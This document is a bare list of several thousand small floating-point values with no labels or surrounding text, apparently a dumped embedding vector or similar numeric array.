-0.052184753119945526, 0.03377776965498924, 0.0019974505994468927, -0.037320006638765335, 0.00043413168168626726, 0.003730023978278041, -0.03167456388473511, 0.016430290415883064, -0.05560048297047615, 0.0317852608859539, 0.02873324230313301, -0.019102783873677254, 0.018960461020469666, 0.0288755651563406, -0.02150644361972809, 0.0491485521197319, -0.028812309727072716, -0.019086970016360283, -0.058004144579172134, 0.07388096302747726, -0.033493123948574066, -0.03605492040514946, -0.008539323695003986, 0.018818138167262077, -0.01484893448650837, -0.007511442061513662, 0.024637529626488686, -0.06467746943235397, -0.011037866584956646, -0.022771529853343964, 0.01177319698035717, 0.00942488294094801, 0.017473986372351646, 0.023799410089850426, -0.0046333735808730125, -0.027816055342555046, 0.014248019084334373, -0.003706303657963872, 0.02822720818221569, -0.023419884964823723, -0.019102783873677254, 0.016936324536800385, 0.03561214357614517, 0.04374031350016594, -0.009116518311202526, 0.015196832828223705, -0.04253848269581795, 0.024748224765062332, -0.03586515784263611, 0.015141485258936882, 0.015022884123027325, 0.013726172037422657, 0.02237619087100029, 0.02039949595928192, -0.016493545845150948, 0.026788173243403435, 0.013101535849273205, -0.004997085779905319, -0.03583353012800217, -0.008634204976260662, -0.03826881945133209, -0.020320426672697067, 0.020494377240538597, -0.04756719619035721, -0.03535912558436394, -0.028938818722963333, -0.012753637507557869, -0.014327087439596653, -0.05319682136178017, 0.03358800709247589, 0.0021506445482373238, -0.002437265357002616, 0.0351061075925827, -0.054019127041101456, -0.03037785179913044, -0.03567539528012276, 0.006665416527539492, -0.010009984485805035, -0.029492292553186417, 0.00466895429417491, 0.023261750116944313, -0.015505197457969189, -0.006685183383524418, 0.007100289221853018, -0.021791089326143265, -0.015054510906338692, 0.03235454857349396, -0.0006705938722006977, -0.009480230510234833, 0.027910936623811722, -0.016461918130517006, 0.001879837247543037, 0.03779441490769386, 0.022834783419966698, -0.011994587257504463, -0.02251851186156273, 0.005080106668174267, -0.024779852479696274, -0.006396586075425148, -0.020288800820708275, -0.017632121220231056, 0.030947141349315643, -0.0034888670779764652, 0.04585932940244675, -0.009385349228978157, 0.011528086848556995, 0.015584265813231468, -0.05629628151655197, -0.014659171923995018, -0.03194339573383331, 0.025175191462039948, 0.03292383626103401, 0.008539323695003986, -0.01027090847492218, -0.0201939195394516, -0.020826460793614388, -0.019909273833036423, -0.014564290642738342, 0.014485223218798637, 0.008665831759572029, -0.013900120742619038, -0.017964206635951996, -0.004827089607715607, -0.0018946623895317316, -0.04003993794322014, 0.02889137715101242, 0.029128581285476685, -0.006811691913753748, 0.004597793333232403, -0.010081145912408829, 0.024684971198439598, -0.0006216706824488938, 0.004439657554030418, -0.008143984712660313, -0.00388025282882154, 0.04073573648929596, -0.0323861762881279, -0.03969204053282738, -0.03690885379910469, -0.04222220927476883, 0.008080730214715004, -0.028796495869755745, -0.011749476194381714, -0.022645020857453346, 0.005032666027545929, -0.011749476194381714, 0.04222220927476883, -0.010152306407690048, 0.0016535056056454778, -0.005352890584617853, 0.020605070516467094, 0.02821139432489872, 0.007728878408670425, 0.025412393733859062, 0.009859755635261536, -0.01194714568555355, 0.004854763392359018, -0.005696835927665234, -0.004597793333232403, 0.00738098006695509, 0.0024194750003516674, 0.03760465234518051, -0.013006654568016529, 0.013741984963417053, 0.003977111075073481, 0.02017810568213463, 0.02054181694984436, -0.008563043549656868, -0.0374465137720108, 0.04513190686702728, -0.03488471731543541, 0.013425714336335659, -0.0200041551142931, 0.02721513994038105, -0.02088971622288227, 0.013267578557133675, -0.006317518185824156, 0.0008603566093370318, 0.011899705044925213, -0.015639612451195717, 0.02386266551911831, 0.009828128851950169, 0.027468157932162285, 0.015853095799684525, 0.009788595139980316, 0.029302529990673065, 0.0004017633036710322, 0.02084227465093136, 0.007444234564900398, -0.01469870563596487, -0.009828128851950169, -0.03342986851930618, -0.0023957546800374985, -0.004617560189217329, 0.008452349342405796, 0.007717018481343985, -0.04102037847042084, 0.0012927587376907468, 0.028859751299023628, -0.020573444664478302, 0.0144377825781703, -0.024605901911854744, 0.01805908791720867, 0.005467539187520742, -0.006515187676995993, -0.001759258797392249, 0.0015121718170121312, -0.03218059986829758, 0.02922346256673336, -0.021253427490592003, 0.017458172515034676, 0.019766952842473984, -0.014738240279257298, -0.015497290529310703, 0.0071398233994841576, 0.023435698822140694, 0.015157299116253853, 0.001736526726745069, -0.020636698231101036, -0.007815852761268616, 0.0004909617127850652, -0.011923425830900669, -0.004439657554030418, 0.005740323103964329, 0.0187232568860054, 0.027120258659124374, 0.02001996897161007, -0.019766952842473984, -0.010911357589066029, 0.058193907141685486, -0.023641275241971016, -0.01193923968821764, -0.00638472568243742, 0.012287138029932976, 0.018596749752759933, 0.0474090576171875, -0.039186008274555206, 0.033967532217502594, 0.0144377825781703, 0.011796916835010052, 0.0591110959649086, -0.004574073012918234, 0.015418223105370998, 0.009045357815921307, 0.05186848342418671, 0.015141485258936882, -0.0014311273116618395, 0.020747393369674683, 0.004352682735770941, -0.0417478047311306, 0.02824302203953266, -0.017647935077548027, 0.016825629398226738, 0.020984597504138947, -0.012927587144076824, -0.02552308887243271, -0.024827292189002037, -0.029460666701197624, -0.03478983789682388, 0.022312935441732407, 0.0024194750003516674, -0.03811068460345268, -0.020336240530014038, 0.011789010837674141, 0.03105783648788929, -0.0159479770809412, -0.006685183383524418, 0.01034997683018446, -0.025965869426727295, 0.000021110487068654038, -0.016635866835713387, 0.019134409725666046, -0.03124759905040264, -0.000079685531090945, 0.013164790347218513, 0.020905528217554092, 0.04073573648929596, 0.027831869199872017, -0.0030559708829969168, -0.013062002137303352, 0.008997917175292969, 0.02587098814547062, 0.019166037440299988, -0.005511026363819838, 0.05348146706819534, 0.046997904777526855, -0.015576358884572983, -0.010460671037435532, -0.03339824452996254, -0.04756719619035721, 0.0017651888774707913, -0.0020577397663146257, 0.011417391709983349, -0.01734747737646103, -0.004408030305057764, 0.012382019311189651, 0.003662816248834133, 0.022771529853343964, 0.004748022183775902, -0.030140649527311325, 0.013575943186879158, -0.007021221332252026, 0.005024759564548731, -0.020573444664478302, -0.0014607778284698725, 0.029176022857427597, -0.013520595617592335, 0.006993548013269901, 0.009472323581576347, -0.004384309984743595, -0.0019855904392898083, 0.0018175712320953608, -0.024969615042209625, 0.008634204976260662, -0.01655679941177368, 0.00034196829074062407, -0.008057009428739548, -0.026661666110157967, 0.051172688603401184, -0.006206823047250509, 0.01720515638589859, 0.040640853345394135, -0.01242945995181799, -0.022138986736536026, 0.03002995438873768, -0.01386849395930767, -0.00045241613406687975, -0.023277563974261284, -0.03921763226389885, 0.02305617369711399, 0.010089052841067314, -0.00942488294094801, 0.03384102135896683, 0.028290461748838425, -0.00884768832474947, -0.00016530114226043224, -0.0005584164173342288, -0.004724301863461733, -0.009646273218095303, -0.00593008566647768, -0.025633784011006355, 0.01984602026641369, 0.008381187915802002, -0.01650935970246792, 0.007400746922940016, -0.023103613406419754, 0.013354552909731865, 0.010310442186892033, -0.00047934858594089746, -0.0390278697013855, -0.011314603500068188, -0.017616307362914085, -0.002457032212987542, 0.017331663519144058, -0.013417807407677174, 0.000539143627975136, -0.004834996536374092, 0.013401993550360203, 0.010223467834293842, -0.03257593885064125, 0.01578984223306179, 0.013789426535367966, -0.0040245517157018185, -0.002281106309965253, 0.02485891990363598, 0.009448603726923466, 0.01888139359652996, 0.01591634936630726, -0.008333747275173664, -0.03384102135896683, 0.004293382167816162, -0.028480226173996925, -0.033145226538181305, -0.020763207226991653, 0.010025798343122005, 0.008136077784001827, -0.014327087439596653, -0.0010723571758717299, -0.0008776526665315032, -0.011211815290153027, 0.002751559717580676, -0.0241947490721941, -0.025270072743296623, -0.003241780214011669, 0.0407673642039299, -0.015679147094488144, 0.0004887378890998662, -0.023973360657691956, 0.0403878390789032, 0.010231374762952328, -0.007653763983398676, -0.012184349820017815, -0.010871823877096176, -0.01528380811214447, -0.00893466267734766, -0.027800241485238075, 0.022581767290830612, -0.01720515638589859, -0.0019944855011999607, 0.011124840937554836, -0.009883476421236992, 0.016319595277309418, 0.02555471658706665, -0.011488553136587143, 0.00468081422150135, 0.01537078246474266, 0.013710358180105686, 0.0180432740598917, -0.031026208773255348, 0.016240527853369713, -0.03836370259523392, 0.02084227465093136, -0.0007807946531102061, -0.03801580145955086, 0.026962123811244965, -0.022486886009573936, 0.0015843212604522705, 0.015252180397510529, -0.010745315812528133, -0.024463580921292305, 0.036149803549051285, -0.011615061201155186, -0.00421431427821517, -0.03377776965498924, 0.007361213210970163, -0.0000480584021715913, -0.012611315585672855, -0.02201247774064541, 0.0017770490376278758, -0.002547960262745619, -0.01889720745384693, -0.027246767655014992, -0.0005455678910948336, -0.04238034784793854, -0.021901782602071762, 0.015639612451195717, -0.029650429263710976, 0.012208069674670696, -0.003755721030756831, -0.011733663268387318, 0.006657509598881006, -0.021316681057214737, 0.014801493845880032, 0.0020715766586363316, -0.003312941174954176, -0.01771118864417076, -0.014572197571396828, 0.007566789630800486, 0.0032911975868046284, 0.00759446294978261, -0.0034908438101410866, -0.07078150659799576, 0.021822715178132057, -0.010168120265007019, 0.011148560792207718, 0.0031943395733833313, 0.020620884373784065, 0.0035936320200562477, -0.017916765064001083, 0.016098206862807274, -0.021901782602071762, 0.014619638212025166, -0.02003578282892704, 0.01940324157476425, 0.009606738574802876, 0.0026665618643164635, -0.014255926012992859, 0.028480226173996925, 0.005467539187520742, -0.01704701967537403, -0.008997917175292969, -0.009496044367551804, -0.008618391118943691, -0.027452344074845314, 0.001426185597665608, -0.027515597641468048, 0.013520595617592335, 0.02403661422431469, 0.032639190554618835, 0.01518892589956522, 0.009915103204548359, 0.012548061087727547, -0.02485891990363598, 0.00029897515196353197, -0.025412393733859062, 0.008729086257517338, 0.042158957570791245, -0.019782766699790955, 0.023277563974261284, 0.008792340755462646, -0.02904951386153698, 0.009053263813257217, -0.00028167906566523015, 0.012880146503448486, -0.000999713665805757, -0.06410817801952362, 0.004645233973860741, 0.001950009842403233, -0.023846851661801338, -0.020589258521795273, 0.01260340865701437, -0.004075945820659399, -0.004317102488130331, 0.007503535132855177, -0.010808569379150867, 0.008871408179402351, -0.008752807043492794, 0.0019855904392898083, 0.005704742390662432, 0.0187232568860054, 0.002621097955852747, 0.0025598204229027033, 0.01427173987030983, -0.01755305379629135, 0.012397832237184048, -0.01918185129761696, -0.019988343119621277, -0.009503950364887714, -0.004297335632145405, -0.004724301863461733, -0.02286641113460064, -0.02874905616044998, 0.03384102135896683, 0.04171617701649666, -0.0032358502503484488, -0.023799410089850426, -0.01940324157476425, -0.007744691800326109, -0.01486474834382534, 0.0022297122050076723, 0.025981683284044266, -0.024463580921292305, 0.007499581668525934, -0.026124004274606705, 0.03539075329899788, -0.011227629147469997, 0.001516125281341374, 0.008626298047602177, 0.03104202263057232, -0.0027594666462391615, 0.004850810393691063, -0.03624468296766281, -0.01386849395930767, -0.019956715404987335, -0.048484381288290024, 0.0187232568860054, 0.008784433826804161, 0.04411983862519264, 0.015592171810567379, 0.01684144325554371, -0.02201247774064541, 0.03725675120949745, -0.007962128147482872, -0.015426130034029484, -0.034157294780015945, 0.011488553136587143, -0.02202829159796238, 0.010089052841067314, -0.009314187802374363, -0.01562379952520132, -0.002457032212987542, 0.0019490214763209224, 0.013655010610818863, -0.007262378465384245, -0.00559009425342083, 0.014089884236454964, 0.0003315906214993447, -0.03969204053282738, -0.00137874495703727, 0.00034814546233974397, -0.005629627965390682, -0.005981479771435261, 0.0012215976603329182, 0.008982103317975998, 0.004724301863461733, -0.02653515711426735, -0.01869163103401661, -0.01620890200138092, -0.03905949741601944, -0.03877485543489456, -0.022297121584415436, -0.026313766837120056, -0.004688721150159836, -0.003662816248834133, -0.03478983789682388, -0.01938742771744728, -0.0025321466382592916, 0.03368288651108742, 0.01801164634525776, 0.01688888482749462, -0.03339824452996254, -0.015244273468852043, 0.02005159668624401, 0.03839533030986786, -0.01318851113319397, 0.002781210234388709, -0.029255090281367302, -0.03418892249464989, 0.0038308354560285807, -0.0009601797210052609, -0.006752390880137682, 0.027246767655014992, -0.0009502962348051369, 0.05114106088876724, -0.006266124080866575, -0.02440032549202442, -0.025270072743296623, -0.02085808850824833, 0.0035877018235623837, -0.0006799831753596663, 0.027768615633249283, 0.0008336712489835918, -0.02421056292951107, -0.01918185129761696, 0.012326671741902828, 0.010816476307809353, 0.006657509598881006, 0.003943507093936205, 0.0036153756082057953, 0.007475861348211765, 0.02017810568213463, -0.03690885379910469, 0.017980020493268967, 0.010737408883869648, 0.003002600045874715, -0.021427376195788383, -0.01935580000281334, -0.03327173367142677, -0.045796073973178864, -0.02251851186156273, 0.015513104386627674, 0.00005649024387821555, -0.011749476194381714, 0.008974196389317513, 0.021632952615618706, -0.010571366176009178, -0.019308358430862427, 0.001916406094096601, -0.030583428218960762, 0.006697043310850859, 0.0065626283176243305, -0.015173112973570824, -0.0022059918846935034, -0.000502574781421572, -0.007918640971183777, 0.028306275606155396, 0.013655010610818863, 0.0440882109105587, -0.007246564608067274, 0.011085307225584984, -0.027958378195762634, 0.013749891892075539, 0.00492197135463357, 0.028828123584389687, -0.010848104022443295, 0.0004521690425463021, 0.01010486576706171, 0.0020221592858433723, 0.0011128794867545366, 0.0014578127302229404, 0.006665416527539492, 0.007926547899842262, -0.004123386461287737, -0.014935909770429134, 0.019150223582983017, -0.026282140985131264, -0.02370452880859375, 0.03183269873261452, 0.023182682693004608, 0.014991256408393383, -0.04253848269581795, -0.0014963583089411259, -0.010571366176009178, 0.003239803481847048, -0.002314710058271885, 0.00026018251082859933, -0.004491051658987999, -0.01545775681734085, 0.02085808850824833, -0.008650018833577633, 0.046997904777526855, -0.007574696093797684, -0.01318851113319397, 0.004107572603970766, -0.007448187563568354, -0.0130224684253335, 0.021000409498810768, 0.0008272469858638942, -0.00859467126429081, -0.027910936623811722, 0.018454426899552345, -0.03539075329899788, -0.021237613633275032, -0.03237036243081093, -0.015196832828223705, 0.0013283392181620002, 0.010176027193665504, -0.006218683440238237, -0.001666354131884873, 0.005518933292478323, -0.01027090847492218, -0.017094461247324944, 0.020431121811270714, -0.024178937077522278, 0.009575111791491508, -0.018913019448518753, -0.007471907883882523, -0.00933790858834982, -0.005044526420533657, -0.02941322512924671, -0.00851560290902853, 0.025776106864213943, -0.038332074880599976, -0.007637950591742992, -0.015568451955914497, -0.019086970016360283, 0.012002493254840374, -0.013900120742619038, -0.021996665745973587, -0.024906359612941742, -0.004040365107357502, -0.03801580145955086, -0.03450519219040871, -0.004368496593087912, 0.027246767655014992, 0.07748645544052124, 0.009970450773835182, -0.00013256212696433067, -0.0002735252201091498, -0.014477316290140152, 0.008483976125717163, 0.021980851888656616, -0.0030935280956327915, 0.019086970016360283, 0.007416560780256987, 0.03124759905040264, 0.0016455987934023142, -0.0017533287173137069, 0.000006879826287331525, -0.016430290415883064, 0.00007048153929645196, -0.023419884964823723, -0.018422799184918404, 0.005977526307106018, 0.011464832350611687, -0.00985184870660305, 0.009480230510234833, 0.00618310272693634, -0.01128297671675682, 0.01718934252858162, -0.019260918721556664, -0.0037122336216270924, -0.03871160000562668, -0.015315434895455837, -0.018833952024579048, -0.0018047228222712874, 0.0012561898911371827, -0.017742816358804703, -0.010057425126433372, 0.02221805416047573, -0.0027990005910396576, 0.0028069072868674994, -0.010389510542154312, -0.006281937472522259, -0.002911672228947282, 0.009717433713376522, -0.014327087439596653, -0.012215976603329182, 0.01027090847492218, 0.020241359248757362, -0.00959092564880848, 0.00927465409040451, 0.005076153203845024, -0.003332708263769746, 0.012152722105383873, -0.04775695875287056, -0.031026208773255348, 0.03577027842402458, 0.027468157932162285, -0.01000207755714655, 0.006894713267683983, -0.02674073353409767, -0.001312525593675673, -0.009598832577466965, -0.018327917903661728, 0.002233665669336915, 0.010721595026552677, -0.012753637507557869, 0.014485223218798637, -0.005400331225246191, -0.004095712676644325, -0.0017543170833960176, 0.02455846220254898, -0.002267269417643547, 0.025301698595285416, 0.013844773173332214, -0.007653763983398676, 0.013623383827507496, 0.0012601432390511036, -0.0029037653002887964, 0.030583428218960762, -0.007918640971183777, 0.018470240756869316, -0.038616716861724854, -0.0074640014208853245, 0.029966700822114944, 0.006301704328507185, 0.00683936569839716, 0.027990004047751427, -0.022755715996026993, 0.03504285216331482, -0.002370057627558708, -0.00891884882003069, 0.006361005362123251, 0.0036015387158840895, 0.007060755509883165, 0.015979604795575142, 0.003985017538070679, 0.0031468989327549934, 0.0029373690485954285, 0.010555552318692207, 0.013860587030649185, -0.01888139359652996, -0.008412814699113369, 0.008365374058485031, 0.0033702654764056206, -0.01545775681734085, 0.018470240756869316, 0.01720515638589859, -0.027910936623811722, -0.0016238552052527666, 0.00902163702994585, 0.008539323695003986, 0.006981687620282173, 0.0093616284430027, -0.0315164290368557, -0.01888139359652996, 0.009733247570693493, -0.0032575938384979963, -0.006760297808796167, 0.011717849411070347, 0.017727002501487732, -0.0039869942702353, -0.0027396995574235916, -0.029255090281367302, -0.03025134466588497, -0.014406154863536358, 0.03251268342137337, -0.012579688802361488, 0.007187264040112495, 0.009409069083631039, -0.011449018493294716, -0.00976487435400486, 0.035454005002975464, 0.029950886964797974, 0.009195586666464806, 0.021996665745973587, -0.01235039159655571, -0.00689075980335474, 0.029618801549077034, -0.018660003319382668, 0.013647103682160378, 0.0014370575081557035, -0.005491259507834911, -0.01461173128336668, 0.0008662866894155741, 0.0360865481197834, 0.012745730578899384, -0.00030935282120481133, 0.013117349706590176, 0.0011148561025038362, 0.010840197093784809, 0.008365374058485031, 0.006088221445679665, 0.012136909179389477, -0.0062265899032354355, -0.010903450660407543, 0.02588680200278759, 0.03890136256814003, 0.019751138985157013, 0.013014561496675014, 0.022945478558540344, -0.00942488294094801, -0.01888139359652996, 0.005416145082563162, 0.0056612552143633366, 0.010990425944328308, 0.017980020493268967, -0.012208069674670696, 0.0018590819090604782, 0.020336240530014038, -0.010824383236467838, -0.04424634575843811, -0.01938742771744728, -0.014872655272483826, 0.01168622262775898, 0.014856841415166855, -0.020494377240538597, 0.02572866529226303, -0.004546399228274822, 0.027246767655014992, -0.030267158523201942, 0.006534954532980919, 0.03558051586151123, -0.01318851113319397, -0.017995834350585938, 0.014501036144793034, -0.0024728458374738693, -0.01495172269642353, 0.023910105228424072, -0.013267578557133675, 0.010634620673954487, -0.008207238279283047, -0.037130244076251984, 0.008744900114834309, 0.0267249196767807, 0.03877485543489456, -0.021664580330252647, -0.012121095322072506, -0.020431121811270714, 0.005068246740847826, -0.01609029993414879, -0.0009562263148836792, -0.001639668713323772, 0.01617727428674698, 0.0030006233137100935, -0.019245104864239693, -0.018612561747431755, -0.01152017991989851, -0.007341446354985237, -0.02572866529226303, 0.02522263117134571, 0.02723095379769802, -0.006578441709280014, -0.02519100345671177, -0.014754053205251694, 0.006835412234067917, 0.010191841050982475, 0.004925924353301525, 0.006242403760552406, 0.004289428703486919, 0.010650433599948883, -0.02457427605986595, -0.0005005980492569506, 0.010840197093784809, -0.027310021221637726, 0.0050484798848629, 0.005981479771435261, 0.00462942011654377, -0.004621513653546572, 0.012816892005503178, 0.03627631068229675, -0.020668325945734978, 0.007713065017014742, 0.007942361757159233, -0.017742816358804703, 0.0075549292378127575, 0.008610484190285206, 0.011362044140696526, -0.0002584528992883861, -0.02236037701368332, -0.012342485599219799, -0.013797332532703876, 0.0028088840190321207, -0.02139575034379959, -0.005242195911705494, 0.01276945136487484, -0.022645020857453346, -0.006388679146766663, -0.018138155341148376, -0.00031231786124408245, 0.0069777341559529305, -0.003947460558265448, -0.0011968889739364386, 0.005949852522462606, 0.007222844287753105, 0.010247188620269299, 0.001930242870002985, -0.01510195154696703, -0.0130224684253335, 0.022138986736536026, 0.018438613042235374, -0.0047163949348032475, 0.015070324763655663, 0.012729917652904987, -0.004222221206873655, -0.01905534230172634, 0.0006231531733646989, 0.004435704089701176, -0.007867246866226196, 0.015600078739225864, 0.009132332168519497, -0.004886390641331673, -0.007475861348211765, 0.017442358657717705, 0.0038644392043352127, -0.006301704328507185, 0.017284223809838295, -0.010595086961984634, 0.004459424410015345, 0.01461173128336668, 0.01260340865701437, -0.014469409361481667, -0.026297952979803085, -0.004040365107357502, -0.006610068958252668, 0.02906532771885395, 0.009464416652917862, -0.010500204749405384, 0.013148976489901543, -0.016778189688920975, -0.020146477967500687, -0.012223883531987667, -0.019434867426753044, -0.007365166675299406, 0.006475653499364853, -0.00696587422862649, -0.004910110961645842, -0.028448598459362984, 0.0023957546800374985, 0.010721595026552677, -0.023846851661801338, 0.044341228902339935, -0.02620307169854641, -0.01889720745384693, 0.006550767924636602, 0.022787343710660934, 0.010168120265007019, 0.024305444210767746, -0.003896066453307867, -0.00488243717700243, -0.009978357702493668, 0.004558259155601263, 0.008057009428739548, 0.0008588740602135658, 0.01610611379146576, 0.0023957546800374985, -0.004969411995261908, -0.007570742629468441, 0.018106527626514435, 0.0040561784990131855, -0.01220016274601221, -0.0006009153439663351, -0.00375374429859221, 0.004570119548588991, 0.015410316176712513, 0.004514771979302168, -0.0337461419403553, -0.032307107001543045, 0.008618391118943691, 0.0076814377680420876, 0.010531832464039326, 0.00036988910869695246, -0.005566373933106661, -0.022898036986589432, 0.028859751299023628, 0.003927693702280521, 0.034631699323654175, -0.002668538596481085, 0.004637327045202255, 0.009551391936838627, 0.003392009064555168, 0.024305444210767746, 0.0163828507065773, 0.003135038772597909, -0.02923927642405033, 0.016074486076831818, -0.0071951705031096935, -0.0014479293022304773, 0.019988343119621277, -0.0024056381080299616, 0.014232206158339977, 0.00008802470983937383, 0.012382019311189651, -0.027262581512331963, -0.007005407940596342, -0.023672902956604958, -0.0011267162626609206, 0.020241359248757362, -0.024147309362888336, 0.018644189462065697, -0.0005435912171378732, -0.028796495869755745, 0.012888053432106972, -0.006823551841080189, -0.011085307225584984, 0.005973572842776775, -0.0015418223338201642, 0.0001445458474336192, 0.009401163086295128, 0.014327087439596653, -0.03257593885064125, -0.006570535246282816, 0.00071457534795627, -0.016477731987833977, -0.019150223582983017, -0.005155221093446016, 0.004597793333232403, -0.005605907645076513, 0.0013767682248726487, 0.028828123584389687, 0.012982934713363647, -0.016762375831604004, -0.011156467720866203, 0.03320848196744919, 0.00917186588048935, -0.017995834350585938, 0.009298374876379967, -0.007558882702142, -0.04386682063341141, 0.0008697459124960005, -0.013307112269103527, 0.009227213449776173, 0.002451102016493678, -0.0010357883293181658, 0.006357051897794008, 0.0117573831230402, 0.006455886643379927, 0.02873324230313301, -0.009013730101287365, 0.02803744561970234, 0.01853349432349205, 0.00023794469598215073, -0.03551726043224335, -0.006139615550637245, 0.03542237728834152, 0.015924256294965744, -0.0157028678804636, 0.016042858362197876, 0.011053679510951042, -0.021411562338471413, 0.00044327392242848873, -0.0285751074552536, 0.039470650255680084, -0.014089884236454964, 0.011749476194381714, -0.007341446354985237, 0.016667494550347328, -0.028258835896849632, -0.01888139359652996, -0.004597793333232403, -0.0007200112449936569, -0.001980648608878255, -0.02620307169854641, -0.0021249474957585335, -0.0041747805662453175, 0.005364750977605581, -0.007072615437209606, -0.03320848196744919, 0.010065332055091858, -0.007946315221488476, -0.006590302102267742, -0.01560798566788435, -0.008381187915802002, -0.011306696571409702, 0.01061089988797903, 0.0008267528028227389, 0.01319641713052988, 0.002775280037894845, 0.023989174515008926, -0.0049931323155760765, -0.03535912558436394, -0.010903450660407543, 0.008491883054375648, -0.0004944208776578307, 0.005831250920891762, 0.0011059610405936837, -0.0043408228084445, 0.007392840459942818, 0.023609647527337074, -0.02323012240231037, -0.02055763080716133, -0.013164790347218513, -0.01968788541853428, -0.005827297456562519, 0.02405242808163166, 0.008167704567313194, 0.006906573195010424, 0.023309189826250076, 0.022961292415857315, -0.004404076840728521, -0.0015912397066131234, 0.0022395956330001354, 0.0200041551142931, -0.01018393412232399, 0.015252180397510529, -0.013568036258220673, 0.026471903547644615, 0.016114018857479095, -0.0025894707068800926, 0.009480230510234833, 0.0024194750003516674, -0.022771529853343964, -0.0025538902264088392, -0.0006132696871645749, 0.027673734351992607, -0.012524341233074665, 0.02587098814547062, 0.0018215246964246035, 0.003372242208570242, -0.015900537371635437, -0.02519100345671177, -0.015742400661110878, 0.0008173634996637702, -0.010950891301035881, -0.0008993963128887117, 0.009938823990523815, -0.011496460065245628, 0.005439865402877331, -0.00040028078365139663, 0.018454426899552345, -0.0000018106837842424284, 0.022107359021902084, 0.004574073012918234, 0.011203908361494541, 0.007048895116895437, 0.0034888670779764652, -0.017236782237887383, 0.01652517169713974, 0.01704701967537403, 0.0007625101716257632, -0.007452141027897596, 0.018913019448518753, 0.02305617369711399, 0.004748022183775902, -0.0019984389655292034, -0.0006483560428023338, 0.01971951127052307, -0.025254258885979652, 0.006633789278566837, -0.003057947615161538, 0.0033682887442409992, 0.010998332872986794, 0.011915518902242184, -0.028938818722963333, -0.0004726772604044527, 0.0007980907103046775, -0.03007739596068859, 0.03170619159936905, -0.016003325581550598, 0.014817307703197002, -0.006100081373006105, -0.008092590607702732, -0.01293549407273531, -0.0018452450167387724, 0.00689075980335474, 0.02139575034379959, 0.009859755635261536, -0.02335663139820099, -0.0015566474758088589, 0.007317726034671068, -0.0016347269993275404, 0.006032873876392841, -0.0071042426861822605, -0.017821883782744408, -0.004688721150159836, 0.00022460200125351548, -0.0071279630064964294, -0.016825629398226738, -0.0064954208210110664, 0.00944069679826498, 0.02754722535610199, -0.01619308814406395, 0.014010815881192684, -0.018644189462065697, 0.006187056191265583, 0.004281521774828434, 0.005273823160678148, 0.02172783389687538, 0.0013995002955198288, -0.021142732352018356, -0.002761443378403783, -0.016461918130517006, -0.030330412089824677, 0.019766952842473984, -0.014311273582279682, -0.01410569716244936, -0.005171034950762987, -0.012714103795588017, -0.0024451720528304577, 0.023419884964823723, -0.01329129934310913, -0.0023621509317308664, -0.012650849297642708, 0.008618391118943691, -0.013394086621701717, -0.008744900114834309, 0.012318764813244343, 0.01938742771744728, 0.020083224400877953, 0.03652932867407799, -0.0008287294767796993, 0.02035205438733101, 0.003832812188193202, -0.0322754792869091, 0.007207030896097422, -0.005858924705535173, 0.0011573550291359425, 0.01933998614549637, -0.0007308830972760916, 0.0021447143517434597, 0.0023661041632294655, -0.013133163563907146, 0.00002378211502218619, -0.0006305658025667071, 0.009725340642035007, 0.002073553390800953, -0.006408446002751589, -0.016778189688920975, -0.011306696571409702, -0.012334578670561314, 0.014390341006219387, -0.024084055796265602, -0.018501868471503258, 0.010666247457265854, 0.0064954208210110664, 0.018580935895442963, -0.016224713996052742, 0.005483352579176426, -0.012334578670561314, -0.010294629260897636, -0.012674570083618164, 0.003004576778039336, 0.0033070112112909555, 0.000863321649376303, -0.008681645616889, 0.0072781918570399284, 0.004257801454514265, -0.0056256745010614395, -0.005483352579176426, -0.009986264631152153, 0.019814392551779747, -0.005020806100219488, -0.012382019311189651, -0.01685725711286068, 0.008230959065258503, -0.028432784602046013, 0.002814813982695341, -0.0029195789247751236, 0.006424259394407272, -0.003579795127734542, 0.009828128851950169, -0.01128297671675682, -0.0019025692017748952, -0.03621305525302887, 0.0042419880628585815, 0.015987511724233627, 0.008049103431403637, 0.017505614086985588, 0.010547646321356297, 0.0062265899032354355, 0.01376570574939251, -0.012911773286759853, 0.00893466267734766, -0.004305242095142603, 0.016635866835713387, 0.023419884964823723, 0.008349561132490635, 0.009282561019062996, -0.001698969630524516, 0.022945478558540344, -0.01654098555445671, 0.028306275606155396, -0.008665831759572029, -0.004277568310499191, 0.013117349706590176, -0.016098206862807274, 0.002470869105309248, 0.011480646207928658, -0.006795878522098064, -0.0033109644427895546, -0.003706303657963872, -0.02152225747704506, 0.00676425127312541, 0.0012097375001758337, 0.01954556256532669, 0.0057759033516049385, -0.008555136620998383, 0.01001789141446352, 0.007539115846157074, -0.011077400296926498, -0.004684767685830593, -0.02370452880859375, -0.005708695854991674, 0.016224713996052742, 0.021601324900984764, -0.013228044845163822, -0.016240527853369713, 0.005566373933106661, 0.00071457534795627, 0.009717433713376522, -0.01685725711286068, -0.005254055839031935, 0.017727002501487732, 0.022154800593852997, -0.006013107020407915, 0.015813561156392097, 0.011559713631868362, -0.00559009425342083, -0.00967790000140667, -0.009298374876379967, -0.004238034598529339, -0.014429875649511814, -0.029666243121027946, 0.01001789141446352, 0.01427173987030983, 0.0026764452923089266, -0.015679147094488144, -0.009970450773835182, -0.005198708735406399, -0.015117765404284, -0.008381187915802002, -0.0036806066054850817, -0.009385349228978157, -0.005020806100219488, 0.018438613042235374, 0.011915518902242184, 0.005202661734074354, -0.015323341824114323, -0.01000207755714655, -0.03384102135896683, -0.011409484781324863, 0.012271324172616005, -0.009978357702493668, 0.00252423994243145, 0.002099250443279743, 0.006981687620282173, -0.019086970016360283, -0.0010496252216398716, -0.024937987327575684, 0.005665208678692579, 0.0007689344347454607, 0.021174360066652298, 0.01821722276508808, -0.00918767973780632, 0.022281309589743614, -0.002978879725560546, -0.006538907997310162, -0.01577402837574482, 0.004621513653546572, 0.0095118572935462, 0.00869745947420597, -0.004004784394055605, 0.02501705475151539, -0.005341030657291412, -0.010516018606722355, 0.010318349115550518, -0.009472323581576347, -0.014429875649511814, 0.0010427067754790187, -0.011362044140696526, -0.009377442300319672, -0.003726070513948798, -0.01635122299194336, 0.01971951127052307, 0.007301912177354097, 0.00033900325070135295, 0.022075733169913292, -0.015362875536084175, -0.00002518742076063063, 0.0036153756082057953, 0.003876299364492297, -0.010033705271780491, -0.017980020493268967, -0.006499373819679022, 0.032291293144226074, -0.0011642734752967954, 0.009630459360778332, 0.005095920525491238, -0.0019658233504742384, 0.0011029959423467517, -0.0012532247928902507, 0.007037035189568996, -0.023166868835687637, 0.015528918243944645, -0.006072408054023981, -0.0004437680763658136, -0.013552222400903702, 0.015560545027256012, 